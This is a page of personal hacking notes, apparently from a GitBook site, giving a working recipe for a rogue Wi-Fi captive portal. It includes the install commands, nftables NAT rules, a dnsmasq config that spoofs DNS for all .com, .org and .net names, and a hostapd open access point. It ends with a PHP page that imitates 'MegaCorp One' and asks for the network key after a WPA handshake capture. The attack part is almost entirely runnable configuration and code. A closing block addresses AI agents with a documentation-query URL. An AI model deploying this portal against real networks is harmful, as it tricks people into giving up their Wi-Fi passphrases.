# Captive Portal

Capture WPA handshake then:

#### install tooling:

```
apt install apache2 libapache2-mod-php
apt install dnsmasq
apt install nftables
apt install hostapd
```

### Networking setup: 

<pre><code># IP Bits
ip addr add 192.168.87.1/24 dev wlan0
ip link set wlan0 up

# DNS bits
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
nft 'add chain nat PREROUTING { type nat hook prerouting priority dstnat; policy accept; }'
nft add rule ip nat PREROUTING iifname "wlan0" udp dport 53 counter redirect to :53
nft 'add chain nat postrouting { type nat hook postrouting priority 100 ; }'
<strong>nft add rule ip nat postrouting oifname "eth0" ip daddr != 10.0.0.1/24 masquerade
</strong></code></pre>

#### DNSMasQ setup (dns.conf):&#x20;

```
 Main options
# http://www.thekelleys.org.uk/dnsmasq/docs/dnsmasq-man.html
domain-needed
bogus-priv
no-resolv
filterwin2k
expand-hosts
domain=localdomain
local=/localdomain/
# Only listen on this address. When specifying an
# interface, it also listens on localhost.
# We don't want to interrupt any local resolution
# since the DNS responses will be spoofed
listen-address=192.168.87.1

# DHCP range
dhcp-range=192.168.87.100,192.168.87.199,12h
dhcp-lease-max=100

# This should cover most queries
# We can add 'log-queries' to log DNS queries
address=/com/192.168.87.1
address=/org/192.168.87.1
address=/net/192.168.87.1

# Entries for Windows 7 and 10 captive portal detection
address=/dns.msftncsi.com/131.107.255.255
```

and execute:&#x20;

```
dnsmasq --conf-file=dns.conf
```

### HostAPD setup:

create hostapd.conf:

```
interface=wlan0
ssid=Captive_Portal
channel=11

# 802.11n
hw_mode=g
ieee80211n=1

# Uncomment the following lines to use OWE instead of an open network
#wpa=2
#ieee80211w=2
#wpa_key_mgmt=OWE
#rsn_pairwise=CCMP
```

and execute:

```
hostapd -B hostapd.conf
```

### Building the portal:

create 'index.php' in /var/www/html/portal:

```
<!DOCTYPE html>
<html lang="en">

	<head>
		<link href="assets/css/style.css" rel="stylesheet">
		<title>MegaCorp One - Nanotechnology Is the Future</title>
	</head>
	<body style="background-color:#000000;">
		<div class="navbar navbar-default navbar-fixed-top" role="navigation">
			<div class="container">
				<div class="navbar-header">
					<a class="navbar-brand" style="font-family: 'Raleway', sans-serif;font-weight: 900;" href="index.php">MegaCorp One</a>
				</div>
			</div>
		</div>

		<div id="headerwrap" class="old-bd">
			<div class="row centered">
				<div class="col-lg-8 col-lg-offset-2">
					<?php
						if (isset($_GET["success"])) {
							echo '<h3>Login successful</h3>';
							echo '<h3>You may close this page</h3>';
						} else {
							if (isset($_GET["failure"])) {
								echo '<h3>Invalid network key, try again</h3><br/><br/>';
							}
					?>
				<h3>Enter network key</h3><br/><br/>
				<form action="login_check.php" method="post">
					<input type="password" id="passphrase" name="passphrase"><br/><br/>
					<input type="submit" value="Connect"/>
				</form>
				<?php
						}
				?>
				</div>

				<div class="col-lg-4 col-lg-offset-4 himg ">
					<i class="fa fa-cog" aria-hidden="true"></i>
				</div>
			</div>
		</div>

	</body>
</html>
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://f1rstbyt3.gitbook.io/hacking-notes/wireless/captive-portal.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.